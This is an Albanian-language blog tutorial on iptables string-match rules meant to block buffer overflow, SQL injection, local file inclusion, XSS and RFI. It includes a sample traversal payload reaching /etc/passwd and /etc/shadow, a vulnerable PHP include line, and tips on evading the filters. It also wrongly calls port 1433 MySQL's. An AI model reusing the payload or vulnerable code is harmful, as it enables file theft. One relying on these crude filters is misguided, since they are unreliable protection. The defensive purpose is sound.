Nje firewall ne pergjithesi do te shkoj dhe do te monitoroj portat qe jane te mbyllura, apo te filtruara dhe do te anashkaloj monitorimin e portave 80\22\25 etj ku nje server ofron sherbimet e veta “duke ja lene ne dore” keshtu sigurine vet aplikacionit qe eshte duke perdorur porten. [gabim ky qe lejon shumicen e sulmeve qe ndodhin sot]
Kjo sjell qe keto sulme nga ana tjeter te jene te suksesshme dhe ne sisteme jo te rregulluara (not hardened) edhe te pakapshme.
Te shohim disa rregulla qe mund ti impostojm iptables kunder disa sulmeve normale.

Iptables VS buffer overflow

Ky edhe pse sulm goxha i vjeter ne ‘moshe’ eshte edhe ne kete moment shume i perdorur dhe tipik per nje root account.

Shfrytezohet nje aplikacion i koduar ne C\C++ zakonisht dhe nje funksion malloc()  strcat() scanf() , strcpy() i pa kontrolluar me ane te se cilit arrihet ne zona te memorjes qe nuk duhet te jene te aksesueshme, duke ber “rishkrim” te ketyre zonave ne RAM e rjedhimisht nese hyet ne zona te rezervuara te memorjes si ato te sistemit operativ atehere mund te modifikosh pid-t e proçeseve e keshtu dhe uid (root @ uid= 0) dhe sistemi kompromentohet.
Rasti tipik eshte nje reverse shell qe lidhet me makinen e sulmuar.
Keto lloj sulmesh jane shume te veshtira per tu kapur, edhe nese nje sistem ka firewall dhe antivirus nuk ka shance kunder nje exploiti 0-day. Nje zgjidhje ne keto raste do te ishte nje fwsnort i integruar me snort + iptables normalisht dhe te shpresonim qe sulmi te njihej nga snort, ose me sakt snort te kete te regjistruar ne db shellin qe eshte duke perdorur sulmuesi.
Po marrim nje rast se si mund te bllokojm nje te tille nga porta 443 ku dihet qe per te bere overflow e mbushim hapesiren e memorjes me karaktere ç’faredo pastaj kur jemi ne hapesiren e duhur perdorim shellcode (ku shumica e atyre qe perdoren jane ne db e snort)
iptables -I INPUT 1 -p tcp –dport 443 -m string –string “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA” -j DROP
Ne kete rast vihet re mire pjesa me “AAAA” e cila nuk do ishte e zakonshme, ne keto raste keshtu qe kjo lloj lidhjeje do te duhej te ndalohej.
Nje menyre per ta anashkaluar gjithsesi eshte qe ta mbushesh me BBBB ose CCCC ose me ABDEF… keshtu qe siç e thashe do te duhej nje snort i konfiguruar mire per tu marre me keto lloj sulmesh, por ne shumicen e rasteve kodi i exploitit perdoret nga worme, boote keshtu qe pjesa me siper mund te jete shume efektive.

iptables VS sql Injection

LoL, ne kete rast nuk kemi ç’fare te sqarojm, shkoni tek nje PKSH-crew dhe do jete gjeja e pare qe do u mesojn, ne keto raste duhet te evitojm string si “select, union, from, apo karaktere null”, dikush i zgjuar eshte duke menduar tani, se edhe nese ne bllokojm union, select etj etj duke njohur mire iptables mendon po sikur ti fus ne hexadecimal karakteret e sql injection?
Dhe ben mire te mendoj keshtu pasi mund ti behet evazion kesaj metode mbrojtese por per fat te mire iptables ka dhe opcionin –hex-string dhe per ta bllokuar nje null character ne hex do te ishte diçka e tille:
iptables -I INPUT 1 -p tcp –dport 1433  -m string –hex-string “‘|00|” –algo bm -m string –hex-string
“-|00|-|00|” –algo bm -j REJECT
Siç e shohim porta qe monitorohet eshte 1433, pra e mysql-s . Me sa me shume opcione gjithperfshirese, aq me pak do te ishin shanset per te pasur nje sulm te suksesshem, e ne kete rast duke marre parasysh nje server dhe 2000 website te hostuara ne te, do te ishte nje LAJM MADHESHTOR per klientet qe do e ndienin veten nen nje sherbim perfekt.

iptables VS Local File Inclusion

Ne keto raste, perdoret nje fail psh nje php dhe me ane te tij mund te aksesohet nje fail tjeter ne direktori, psh e zeme se faili yne skedari.php ka nje rresht ku shkruhet ky funksion:

 require("./../".$_GET["emriskedarit"]);

Duke pare thjesht me browser nje file te tille dhe duke perfituar nga ndonje funksion mund te shkojm direkt tek:

file.php?shko_tek=../../../../../../../etc/passwd%00
Ose mund te jete nje config.php, ose mund te jete nje /etc/shadow%00
Thame qe per keto perdorim browserin keshtu qe porta per tu monitoruar eshte 80 (web-server).
Keshtu qe:
iptables -I INPUT 1 -p tcp –dport 80 -m string –string “/etc/shadow” –algo bm -j REJECT
ose
iptables -I INPUT 1 -p tcp –dport 80 -m string –string “../../” –algo bm -j REJECT

iptables VS CSS (XSS) dhe RFI

Ketu besoj se imagjiononi vet…

shembull kunder Cross Site Scripting

iptables -I INPUT 1 -p tcp –dport 80 -m string –string “<>” –algo bm -j REJECT

Shembull kunder Remote File Inclusion
iptables -I INPUT 1 -p tcp –dport 80 -m string –string “=http://” –algo bm -j REJECT